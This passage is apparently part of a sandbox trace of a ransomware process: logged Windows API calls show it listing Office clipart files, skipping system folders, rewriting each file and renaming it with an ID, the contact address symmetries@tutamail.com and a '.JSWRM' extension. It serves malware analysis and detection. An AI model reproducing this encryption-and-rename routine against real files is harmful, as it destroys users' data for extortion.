lpOverlapped=0x0) returned 1 [0077.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.737] CloseHandle (hObject=0x314) returned 1 [0077.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0077.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0077.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0077.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0077.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0077.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0077.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0077.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0077.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.738] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0077.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0077.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0077.738] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x76ce, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01657_.WMF", cAlternateFileName="")) returned 1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2=".") returned 1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="..") returned 1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="...") returned 1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="windows") returned -1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="recovery") returned -1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="perflogs") returned -1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="documents and settings") returned 1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="system volume information") returned -1 [0077.738] lstrcmpiW (lpString1="FD01657_.WMF", lpString2="msocache") returned -1 [0077.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0077.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01657_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01657_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01657_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0077.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0077.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01657_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01657_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01657_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0077.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0077.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0077.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0077.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.739] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30414) returned 1 [0077.739] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76c0) returned 0x24d210 [0077.739] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x76c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x76c0, lpOverlapped=0x0) returned 1 [0077.744] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.745] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x76c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x76c0, lpOverlapped=0x0) returned 1 [0077.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.746] CloseHandle (hObject=0x314) returned 1 [0077.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0077.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0077.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0077.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0077.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0077.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0077.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0077.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0077.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0077.747] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4604, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01658_.WMF", cAlternateFileName="")) returned 1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2=".") returned 1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="..") returned 1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="...") returned 1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="windows") returned -1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="recovery") returned -1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="perflogs") returned -1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="documents and settings") returned 1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="system volume information") returned -1 [0077.747] lstrcmpiW (lpString1="FD01658_.WMF", lpString2="msocache") returned -1 [0077.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0077.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01658_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01658_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01658_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0077.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0077.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01658_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01658_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01658_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0077.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0077.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0077.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0077.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.748] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17924) returned 1 [0077.748] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4600) returned 0x24d210 [0077.749] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4600, lpOverlapped=0x0) returned 1 [0077.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.946] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4600, lpOverlapped=0x0) returned 1 [0077.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.947] CloseHandle (hObject=0x314) returned 1 [0077.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0077.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0077.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0077.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0077.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0077.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0077.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.947] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0077.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0077.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0077.948] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01659_.WMF", cAlternateFileName="")) returned 1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2=".") returned 1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="..") returned 1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="...") returned 1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="windows") returned -1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="recovery") returned -1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="perflogs") returned -1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="documents and settings") returned 1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="system volume information") returned -1 [0077.948] lstrcmpiW (lpString1="FD01659_.WMF", lpString2="msocache") returned -1 [0077.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0077.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01659_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01659_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01659_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0077.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0077.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01659_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01659_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01659_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0077.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0077.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0077.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0077.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.950] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31180) returned 1 [0077.950] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x79c0) returned 0x24d210 [0077.950] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x79c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x79c0, lpOverlapped=0x0) returned 1 [0077.954] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.954] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x79c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x79c0, lpOverlapped=0x0) returned 1 [0077.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.955] CloseHandle (hObject=0x314) returned 1 [0077.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0077.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0077.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0077.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0077.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0077.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0077.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0077.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0077.956] MoveFileW (lpExistingFileName="C:\\Program 